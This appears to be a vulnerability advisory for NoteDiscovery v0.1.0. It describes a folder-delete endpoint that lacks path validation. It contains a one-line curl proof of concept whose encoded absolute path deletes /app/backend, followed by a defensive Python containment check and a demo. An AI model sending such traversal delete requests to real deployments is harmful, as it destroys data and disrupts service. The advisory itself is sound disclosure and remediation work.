Description
The folder deletion code at https://github.com/gamosoft/NoteDiscovery/blob/v0.1.0/backend/utils.py#L130 is missing a call to validate_path_security(), so an authenticated user can delete directories outside the notes directory. Beyond causing service interruptions, not much further damage can be done with this.
PoC
curl -v -X DELETE "http://127.0.0.1:8000/api/folders/%2fapp%2fbackend"
< HTTP/1.1 200 OK
< server: uvicorn
< content-length: 78
< content-type: application/json
<
* Connection #0 to host 127.0.0.1 left intact
{"success":true,"path":"/app/backend","message":"Folder deleted successfully"}
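The kind of containment check the delete handler is missing, as an added example that is not NoteDiscovery's own code: the notes root /app/notes and the names NOTES_DIR, resolve_notes_path and delete_folder are assumptions, not the project's validate_path_security() API. It rejects the PoC's absolute path, a '..' hop, a prefix look-alike and the notes root itself, and demo() exercises it in a scratch tree.

```python
# Added example, not NoteDiscovery's code: the containment check the folder-delete
# handler omitted, against a hypothetical notes root. NOTES_DIR, resolve_notes_path
# and delete_folder are assumed names, not the project's validate_path_security() API.
import shutil
import tempfile
from pathlib import Path

NOTES_DIR = Path("/app/notes")  # assumed; the real root comes from app config


def resolve_notes_path(requested: str, notes_dir: Path = NOTES_DIR) -> Path:
    """Return the on-disk folder for a client path, or raise ValueError.

    Compare fully resolved paths (absolute, '..' collapsed, symlinks followed),
    never raw strings: an absolute request like '/app/backend', a '../' hop,
    a '/app/notes2' prefix look-alike and a planted symlink all fail the same way.
    """
    root = notes_dir.resolve()
    # pathlib drops `root` when `requested` is absolute, which is exactly how
    # the PoC's %2fapp%2fbackend ends up pointing at /app/backend.
    candidate = (root / requested).resolve()
    rel = candidate.relative_to(root)  # ValueError when candidate leaves root
    if rel == Path("."):
        raise ValueError("refusing to operate on the notes root itself")
    return candidate


def delete_folder(requested: str, notes_dir: Path = NOTES_DIR) -> dict:
    """Handler logic with the check in place: validate first, then remove."""
    target = resolve_notes_path(requested, notes_dir)  # raises before any I/O
    shutil.rmtree(target)
    return {"success": True, "path": str(target), "message": "Folder deleted successfully"}


def demo() -> dict:
    """Run the handler in a scratch tree: one legitimate delete, two escapes."""
    with tempfile.TemporaryDirectory() as tmp:
        notes = Path(tmp) / "notes"
        (notes / "work").mkdir(parents=True)
        backend = Path(tmp) / "backend"  # stands in for /app/backend
        backend.mkdir()
        out = {"in_tree": delete_folder("work", notes)["success"]}
        for key, bad in (("dotdot", "../backend"), ("absolute", str(backend))):
            try:
                delete_folder(bad, notes)
                out[key] = "deleted"
            except ValueError:
                out[key] = "rejected"
        out["backend_intact"] = backend.is_dir()
    return out
```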